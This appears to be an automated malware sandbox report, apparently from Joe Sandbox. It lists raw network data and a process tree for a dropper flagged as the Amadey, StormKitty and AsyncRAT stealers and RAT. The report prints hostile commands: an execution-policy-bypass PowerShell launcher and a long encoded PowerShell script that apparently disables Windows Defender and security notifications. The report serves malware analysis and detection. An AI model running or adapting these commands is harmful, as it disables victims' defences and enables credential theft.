2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 58 41 4f 74 46 59 65 2f 55 7a 79 73 44 31 4c 50 6c 74 56 42 55 51 4e 56 49 79 4f 30 6a 4c 56 37 79 6b 41 35 33 69 39 51 67 4a 31 64 47 71 77 52 72 39 34 61 66 59 43 76 55 73 65 6d 77 53 78 74 36 6d 46 32 4a 39 32 4d 74 57 4c 6a 48 52 48 75 44 32 69 55 73 57 41 58 74 54 33 37 76 31 4d 45 74 44 63 4f 6e 36 37 4a 58 57 6c 4c 53 54 4d 48 74 4b 69 46 64 2f 5a 67 41 4d 38 69 5a 49 54 38 58 58 71 56 6c 59 65 54 4b 7a 54 63 49 6b 62 36 67 70 52 31 65 54 4a 67 61 68 2b 6f 69 4c 6c 58 38 6b 51 70 33 69 74 38 6f 4b 6c 67 41 37 30 52 72 35 63 37 50 49 51 58 61 72 75 36 35 55 46 31 47 31 45 50 43 72 6d 31 71 55 2b 44 66 58 44 4f 6f 33 69 55 31 46 54 50 6d 53 6d 4c 6f 30 49 63 2f 52 73 6a 68 36 62 41 64 41 51 44 57 52 38 6a 38 49 6a 68 52 39 6f 30 49 64 6f 44 55 4a 53 Data Ascii: XAOtFYe/UzysD1LPltVBUQNVIyO0jLV7ykA53i9QgJ1dGqwRr94afYCvUsemwSxt6mF2J92MtWLjHRHuD2iUsWAXtT37v1MEtDcOn67JXWlLSTMHtKiFd/ZgAM8iZIT8XXqVlYeTKzTcIkb6gpR1eTJgah+oiLlX8kQp3it8oKlgA70Rr5c7PIQXaru65UF1G1EPCrm1qU+DfXDOo3iU1FTPmSmLo0Ic/Rsjh6bAdAQDWR8j8IjhR9o0IdoDUJS
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 53 6d 4c 6f 30 49 63 2f 52 73 6a 68 36 62 41 64 41 51 44 56 53 73 4c 72 4c 43 74 65 39 70 6f 4f 66 34 37 58 4a 54 56 59 41 75 56 49 5a 4f 58 4c 79 53 51 41 32 4b 72 6c 75 6c 31 59 53 70 67 4d 68 2b 6b 37 61 67 79 34 71 77 4e 2f 69 39 5a 6b 45 6c 51 49 36 30 4e 36 72 39 6d 4a 4f 55 6a 57 72 61 37 6b 48 56 56 4a 32 45 6e 4e 36 69 4d 74 57 66 32 63 41 33 43 4c 33 69 77 70 55 41 4c 70 54 57 48 70 78 73 41 6b 44 63 4f 6b 35 37 42 52 47 51 36 59 52 64 2b 75 65 32 70 37 2f 34 6b 48 58 49 58 49 4c 32 64 49 53 50 77 45 61 2b 4f 47 6e 32 41 50 31 4b 6e 6c 75 6c 56 5a 55 74 31 4d 7a 4f 38 70 4c 46 58 31 6b 77 4a 7a 68 39 6b 67 4b 31 63 42 34 6c 5a 2b 36 73 44 56 4b 6b 69 66 34 65 6d 6b 48 51 45 41 37 6c 4c 51 2f 7a 56 6f 59 66 75 52 43 6e 53 51 6d 54 6c 70 54 6b 62 Data Ascii: SmLo0Ic/Rsjh6bAdAQDVSsLrLCte9poOf47XJTVYAuVIZOXLySQA2Krlul1YSpgMh+k7agy4qwN/i9ZkElQI60N6r9mJOUjWra7kHVVJ2EnN6iMtWf2cA3CL3iwpUALpTWHpxsAkDcOk57BRGQ6YRd+ue2p7/4kHXIXIL2dISPwEa+OGn2AP1KnlulVZUt1MzO8pLFX1kwJzh9kgK1cB4lZ+6sDVKkif4emkHQEA7lLQ/zVoYfuRCnSQmTlpTkb
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 64 54 50 4c 67 58 61 72 75 57 75 58 56 52 45 31 45 62 50 35 53 6c 71 47 72 69 59 48 44 50 65 6d 52 4d 71 57 41 62 6d 55 69 7a 77 69 4e 35 67 44 39 33 68 74 76 78 52 56 30 44 58 54 73 76 6c 4b 79 74 59 39 70 67 42 65 6f 37 52 4e 43 5a 54 44 75 52 4b 59 2b 37 43 77 69 55 4d 31 71 58 6f 73 78 30 58 41 4e 39 61 68 37 5a 6a 42 58 50 4e 33 53 56 4a 78 73 5a 6f 50 68 63 42 36 51 51 30 72 38 72 45 4c 41 44 65 70 2b 65 77 56 31 42 4c 31 45 6e 44 34 69 6f 76 55 76 6d 61 41 58 4b 43 31 53 77 68 56 41 58 71 53 32 50 6e 68 6f 6c 67 44 38 6e 68 74 76 78 34 54 6b 76 57 52 49 66 78 62 54 4d 55 2f 35 4e 45 4b 38 62 56 4c 79 46 52 41 2b 6c 46 61 75 66 44 7a 79 51 4a 31 36 66 74 73 31 6c 63 51 64 64 47 79 2b 41 70 4b 31 58 30 6c 41 74 34 67 35 6c 6f 5a 31 41 65 70 52 77 73 Data Ascii: dTPLgXaruWuXVRE1EbP5SlqGriYHDPemRMqWAbmUizwiN5gD93htvxRV0DXTsvlKytY9pgBeo7RNCZTDuRKY+7CwiUM1qXosx0XAN9ah7ZjBXPN3SVJxsZoPhcB6QQ0r8rELADep+ewV1BL1EnD4iovUvmaAXKC1SwhVAXqS2PnholgD8nhtvx4TkvWRIfxbTMU/5NEK8bVLyFRA+lFaufDzyQJ16fts1lcQddGy+ApK1X0lAt4g5loZ1AepRws
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 63 4e 32 71 37 69 2f 42 4d 5a 52 38 41 43 6e 36 34 4e 49 55 66 76 6e 41 70 34 6b 4d 4a 6d 4f 42 6b 66 70 55 4e 67 72 35 36 48 49 77 50 61 70 65 36 77 58 56 31 4e 32 46 44 49 36 53 51 6a 58 2b 71 56 41 33 53 4e 30 53 30 6f 55 52 54 70 53 6e 37 71 31 4e 56 67 52 70 47 6d 39 76 77 46 47 58 62 66 55 74 66 74 59 52 74 43 2b 34 6b 50 66 6f 71 5a 4f 57 6c 4f 52 75 4a 49 4c 4c 65 47 77 53 38 42 30 71 37 76 74 56 46 55 52 64 46 48 78 75 67 6e 49 46 37 34 6d 51 4a 79 67 39 4d 6c 4a 6c 30 50 34 6b 78 72 37 4e 53 48 62 6b 6a 57 75 61 37 6b 48 58 42 48 79 6b 7a 58 72 6a 78 6b 54 62 69 59 43 44 50 65 6d 53 49 74 57 41 4c 69 53 47 72 71 77 4d 6f 68 42 39 43 68 34 62 68 57 55 45 62 5a 54 38 4c 6a 4a 7a 68 65 38 35 41 49 65 6f 72 55 5a 6d 6b 58 41 66 30 45 4e 4b 2f 33 79 Data Ascii: cN2q7i/BMZR8ACn64NIUfvnAp4kMJmOBkfpUNgr56HIwPape6wXV1N2FDI6SQjX+qVA3SN0S0oURTpSn7q1NVgRpGm9vwFGXbfUtftYRtC+4kPfoqZOWlORuJILLeGwS8B0q7vtVFURdFHxugnIF74mQJyg9MlJl0P4kxr7NSHbkjWua7kHXBHykzXrjxkTbiYCDPemSItWALiSGrqwMohB9Ch4bhWUEbZT8LjJzhe85AIeorUZmkXAf0ENK/3y
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 72 2f 4c 5a 57 58 45 33 56 54 38 54 6f 4a 53 46 59 36 70 59 45 63 49 32 5a 61 47 64 51 48 71 55 63 4c 4d 7a 52 30 53 6f 50 33 62 66 6c 76 56 35 50 54 63 67 43 69 61 34 79 4c 55 57 34 78 78 4a 6a 6b 64 34 35 61 55 35 47 34 6b 67 73 74 34 62 42 4b 51 37 57 70 2b 43 75 57 46 39 50 31 30 76 4f 36 69 73 70 56 50 79 62 41 33 61 46 31 53 30 67 56 41 6e 68 54 57 4c 6d 79 59 64 75 53 4e 61 35 72 75 51 64 65 46 76 62 54 73 71 75 50 47 52 4e 75 4a 67 49 4d 39 36 5a 4b 69 6c 53 42 75 39 43 61 4f 72 41 7a 53 55 49 32 71 4c 68 75 46 74 64 54 39 68 4a 7a 75 38 6c 4c 31 37 7a 6d 51 6c 77 67 4e 39 6d 61 52 63 42 2f 51 51 30 72 2b 62 63 4c 51 54 57 34 66 48 79 52 42 6c 48 31 41 4b 66 72 69 67 6d 55 50 2b 66 43 58 43 4f 33 43 49 74 55 67 62 74 56 6d 54 76 77 64 55 79 43 4e Data Ascii: r/LZWXE3VT8ToJSFY6pYEcI2ZaGdQHqUcLMzR0SoP3bflvV5PTcgCia4yLUW4xxJjkd45aU5G4kgst4bBKQ7Wp+CuWF9P10vO6ispVPybA3aF1S0gVAnhTWLmyYduSNa5ruQdeFvbTsquPGRNuJgIM96ZKilSBu9CaOrAzSUI2qLhuFtdT9hJzu8lL17zmQlwgN9maRcB/QQ0r+bcLQTW4fHyRBlH1AKfrigmUP+fCXCO3CItUgbtVmTvwdUyCN
2024-12-10 10:12:28 UTC	281	IN	Data Raw: 48 57 63 41 79 6b 48 58 37 53 77 37 61 72 6a 48 48 55 33 47 30 6a 41 67 52 77 58 7a 54 32 48 6a 31 2f 6c 67 55 49 58 7a 76 4f 34 50 43 31 2b 59 58 66 69 67 59 79 73 55 6f 4b 59 64 4d 35 43 5a 66 6e 55 5a 52 76 63 45 4e 4b 2b 42 78 44 49 61 31 36 4c 34 76 78 70 6e 66 76 39 55 7a 65 6b 7a 4c 55 50 33 33 30 6f 7a 69 5a 6c 2b 48 68 63 50 34 6c 39 39 2b 63 76 58 4a 30 6a 75 37 36 36 6b 48 51 45 41 37 55 48 4a 34 43 51 38 52 62 57 34 45 6e 6d 42 79 53 45 77 57 45 61 72 42 47 71 76 6e 70 52 75 53 4e 57 77 72 75 51 4e 43 78 75 4e 45 5a 43 2b 63 54 55 61 34 64 38 53 4d 39 36 4c 61 47 64 46 52 72 30 45 4b 2b 7a 55 31 53 59 4c 78 36 4b 70 67 6d 4e 2b 57 74 56 45 30 50 38 64 46 46 50 69 6b 67 4a 6b 6c 35 55 7a 4a 46 6b 49 34 6c 49 73 6f 59 62 49 59 46 44 6f 34 61 62 Data Ascii: HWcAykHX7Sw7arjHHU3G0jAgRwXzT2Hj1/lgUIXzvO4PC1+YXfigYysUoKYdM5CZfnUZRvcENK+BxDIa16L4vxpnfv9UzekzLUP330oziZl+HhcP4l99+cvXJ0ju766kHQEA7UHJ4CQ8RbW4EnmBySEwWEarBGqvnpRuSNWwruQNCxuNEZC+cTUa4d8SM96LaGdFRr0EK+zU1SYLx6KpgmN+WtVE0P8dFFPikgJkl5UzJFkI4lIsoYbIYFDo4ab
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 32 62 66 31 0d 0a 71 55 52 48 30 42 43 4b 76 77 49 64 34 57 4a 2f 68 36 71 30 64 41 52 43 4b 47 5a 4b 39 64 48 6f 47 35 39 45 64 4d 35 43 5a 66 6e 55 5a 52 76 63 45 4e 4b 2b 42 78 44 49 61 31 36 4c 34 76 78 70 6e 66 76 5a 46 77 65 73 6b 4f 68 62 57 6c 42 42 30 78 70 64 6d 4b 42 64 65 33 41 51 6b 72 2f 6d 4a 59 42 43 52 2b 61 36 4a 58 6c 64 4f 33 31 54 57 6f 77 30 74 55 76 32 59 46 44 47 6f 30 6a 49 67 46 30 69 6c 51 69 79 33 6c 6f 6c 67 44 4d 44 68 74 75 77 50 41 68 57 4c 46 5a 65 38 50 47 52 4e 75 49 6c 45 4b 39 53 58 5a 6a 55 58 58 71 55 44 62 2f 33 55 77 53 4d 65 30 75 62 51 67 6c 35 50 54 64 64 4a 78 74 41 64 42 46 6e 35 6e 41 6f 78 74 38 38 72 4e 31 51 44 34 6e 70 53 34 63 48 54 4a 77 62 58 6f 61 37 79 48 56 59 41 67 48 75 48 70 6d 4d 56 47 72 69 48 Data Ascii: 2bf1qURH0BCKvwId4WJ/h6q0dARCKGZK9dHoG59EdM5CZfnUZRvcENK+BxDIa16L4vxpnfvZFweskOhbWlBB0xpdmKBde3AQkr/mJYBCR+a6JXldO31TWow0tUv2YFDGo0jIgF0ilQiy3lolgDMDhtuwPAhWLFZe8PGRNuIlEK9SXZjUXXqUDb/3UwSMe0ubQgl5PTddJxtAdBFn5nAoxt88rN1QD4npS4cHTJwbXoa7yHVYAgHuHpmMVGriH
2024-12-10 10:12:28 UTC	1369	IN	Data Raw: 70 78 64 77 55 5a 71 31 30 73 2b 59 61 66 63 6b 61 52 73 36 37 6b 48 52 35 44 79 6c 44 42 37 54 55 70 45 38 61 68 49 33 32 42 32 44 41 33 57 67 72 45 52 33 33 6c 2b 50 6b 31 43 39 2b 76 36 61 70 4d 47 51 36 59 54 59 65 32 47 6d 6f 63 75 4b 42 4b 4d 35 36 5a 66 6d 64 69 42 65 74 4b 61 2f 6e 58 69 67 63 47 31 71 44 34 72 46 42 56 59 64 74 54 7a 61 35 74 61 6c 4b 34 78 31 59 39 78 74 30 33 5a 77 39 57 74 78 38 35 76 4a 47 58 63 68 65 66 75 4b 36 71 48 51 45 53 6c 67 4c 56 72 6e 74 71 45 2f 75 4e 46 6e 57 46 7a 79 56 67 61 54 6a 41 55 32 2f 2f 77 4d 51 65 4e 76 71 74 36 4c 74 48 58 6b 62 2b 59 6f 65 67 59 79 55 55 6f 4b 5a 45 4f 38 62 6d 61 47 64 50 52 72 30 45 57 65 7a 49 79 53 63 65 77 4f 7a 4c 71 31 35 4a 52 74 73 43 69 61 34 6c 61 67 79 6f 30 55 52 33 6c Data Ascii: pxdwUZq10s+YafckaRs67kHR5DylDB7TUpE8ahI32B2DA3WgrER33l+Pk1C9+v6apMGQ6YTYe2GmocuKBKM56ZfmdiBetKa/nXigcG1qD4rFBVYdtTza5talK4x1Y9xt03Zw9Wtx85vJGXchefuK6qHQESlgLVrntqE/uNFnWFzyVgaTjAU2//wMQeNvqt6LtHXkb+YoegYyUUoKZEO8bmaGdPRr0EWezIyScewOzLq15JRtsCia4lagyo0UR3l

Target ID:	0
Start time:	05:09:57
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x380000
File size:	3'238'912 bytes
MD5 hash:	9ABA31B7A6B0D1AFA4B290557AD5B6FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:10:00
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x280000
File size:	3'238'912 bytes
MD5 hash:	9ABA31B7A6B0D1AFA4B290557AD5B6FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:10:00
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x280000
File size:	3'238'912 bytes
MD5 hash:	9ABA31B7A6B0D1AFA4B290557AD5B6FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:11:00
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x280000
File size:	3'238'912 bytes
MD5 hash:	9ABA31B7A6B0D1AFA4B290557AD5B6FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:11:12
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe"
Imagebase:	0x3b0000
File size:	1'765'888 bytes
MD5 hash:	40F8C17C136D4DC83B130C9467CF6DCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:11:20
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"
Imagebase:	0x900000
File size:	1'839'104 bytes
MD5 hash:	28CD41E552164EFDF6EAF4C5F00B7821
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:11:24
Start date:	10/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x420000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:11:24
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:11:25
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:11:25
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:11:25
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1008
Imagebase:	0x7c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	05:11:25
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZg